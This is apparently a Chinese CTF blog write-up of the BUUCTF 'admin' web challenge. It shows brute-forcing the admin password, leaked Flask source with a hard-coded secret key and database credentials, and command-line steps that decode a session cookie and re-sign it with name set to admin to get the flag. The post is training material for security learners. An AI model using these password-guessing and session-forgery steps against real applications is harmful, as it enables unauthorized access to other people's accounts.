Posted by 曹旭辉 on 2025-2-24 18:49:31

BUUCTF Web track, challenges 21-25, writeups

admin

Opening the page, there are three hints: a redirect link, a login/register form, and a note saying you are not admin.
https://track123.oss-cn-beijing.aliyuncs.com/20250223103944979.png
Clicking hctf: access denied.
https://track123.oss-cn-beijing.aliyuncs.com/20250223104114614.png
Registering an account still does not give access; evidently the admin account is needed.
https://track123.oss-cn-beijing.aliyuncs.com/20250223104255765.png
Weak password

Brute-force the password
https://track123.oss-cn-beijing.aliyuncs.com/20250223104530751.png
With password 123 the response length is clearly different from the other attempts, so that is admin's password.
https://track123.oss-cn-beijing.aliyuncs.com/20250223104816911.png
Log in
https://track123.oss-cn-beijing.aliyuncs.com/20250223104829696.png
Session forgery

The change-password page contains a hint mentioning the session.
https://track123.oss-cn-beijing.aliyuncs.com/20250223105122024.png
Download that source and look at index.php (a Jinja template). Note that the flag is gated on session['name'] == 'admin', not on which user is actually logged in, so any authenticated session whose name field says admin will do:
{% include('header.html') %}
{% if current_user.is_authenticated %}
<h1 >Hello {{ session['name'] }}</h1>
{% endif %}
{% if current_user.is_authenticated and session['name'] == 'admin' %}       {# only rendered when session['name'] == 'admin' #}
<h1 >hctf{xxxxxxxxx}</h1>
{% endif %}

<h1 >Welcome to hctf</h1>

{% include('footer.html') %}

Session value (the session cookie after logging in as the test account track):
.eJw9UE2PgjAQ_SubOXuQghcTD26KRpJpgykh04txEYFC3QQ1QI3_faubeJi8w_uYN_OAw7kvrzUsb_29nMGhOcHyAV8_sASy2iCvFqgokHk8IaOB8t1c8nYSLB00_65lvumkykZy-xpNHAmXhTpPvDN2wsYM7d6QWjPhUoeqCsh6ncVRvjTce_mmIdOGMscFuXgSvJgLtgu812PKSPkOeRaJ7aYjV4V6mwV6S6Pku0mbtfPZkZ8VPGdQXPvz4fbblpfPCWiKQShiyNKQTDUK489wSatNNiBvI-SFr-5XqaR5IZmTwWr1jmvssSo_SWVXx1n6z1yO1hNw649FCzO4X8v-_TcI5vD8A-s4bN0.Z7qRbQ.v-Ap7KW-T8GzuEtnu2WDl_-2plg在config.py中
In config.py the secret key is hard-coded as the fallback, and Flask signs (but does not encrypt) the session cookie with it, so anyone holding the key can re-sign an edited session:
import os
class Config(object):
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'   # SECRET_KEY falls back to the hard-coded 'ckj123'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True

Tool download:
git clone https://github.com/noraj/flask-session-cookie-manager
https://track123.oss-cn-beijing.aliyuncs.com/20250223111234528.png
Decode:
python3 flask_session_cookie_manager3.py decode -c .eJw9UE2PgjAQ_SubOXuQghcTD26KRpJpgykh04txEYFC3QQ1QI3_faubeJi8w_uYN_OAw7kvrzUsb_29nMGhOcHyAV8_sASy2iCvFqgokHk8IaOB8t1c8nYSLB00_65lvumkykZy-xpNHAmXhTpPvDN2wsYM7d6QWjPhUoeqCsh6ncVRvjTce_mmIdOGMscFuXgSvJgLtgu812PKSPkOeRaJ7aYjV4V6mwV6S6Pku0mbtfPZkZ8VPGdQXPvz4fbblpfPCWiKQShiyNKQTDUK489wSatNNiBvI-SFr-5XqaR5IZmTwWr1jmvssSo_SWVXx1n6z1yO1hNw649FCzO4X8v-_TcI5vD8A-s4bN0.Z7qRbQ.v-Ap7KW-T8GzuEtnu2WDl_-2plg -s ckj123
https://track123.oss-cn-beijing.aliyuncs.com/20250223111546572.png
Decoded result. We need to change name to admin (the other fields, including _id and user_id, stay as they are):
{'_fresh': True, '_id': b'bfc0891659a23f0ab48927d0d0a9ae951c4a218757ebff136a62dca06743185bda2c19bfd1e81bb979c9c124747b56a47d6a6c1e84aec87de5df1822f03a08a0', 'csrf_token': b'2705663d7b8161232df50098071c1452bc14b7c2', 'image': b'zXDQ', 'name': 'track', 'user_id': '10'}
Forge the session:
python3 flask_session_cookie_manager3.py encode -t "{'_fresh': True, '_id': b'bfc0891659a23f0ab48927d0d0a9ae951c4a218757ebff136a62dca06743185bda2c19bfd1e81bb979c9c124747b56a47d6a6c1e84aec87de5df1822f03a08a0', 'csrf_token': b'2705663d7b8161232df50098071c1452bc14b7c2', 'image': b'zXDQ', 'name': 'admin', 'user_id': '10'}" -s ckj123
https://track123.oss-cn-beijing.aliyuncs.com/20250223112125285.png
Forged session:
.eJw9UE2PgjAQ_SubOXuQghcTD26KBpJpgykh04txEYFi3QQ1QI3_faubeJi8w_uYN_OA_amvrg0sb_29msG-PcLyAV8_sASy2iCvF6gokEU8IaOBimQueTcJlg2afzey2JylykdyuwZNHAmXh7pIvTN2wsYM7c6QWjPhMoeqDsh6ncVRvjTce_mmJdOFssAFuXgSvJwLlgTe6zFjpHyHIo_EdnMmV4d6mwd6S6PkyaTN2vnsyM8KnjMor_1pf_vtqsvnBDTlIBQxZFlIph6F8We4tNMmH5B3EfLSV_erVNq-kMzRYL16x7X2UFefpOrcxHn2z1wO1hNwONr2AjO4X6v-_TcI5vD8A-oIbNE.Z7qUFw.wgQI2lOZR0DLoEc8neo5vNoDBaU
Replace the session cookie in the request for the index page with the forged value and the flag is returned:
https://track123.oss-cn-beijing.aliyuncs.com/20250223112844984.png
你传你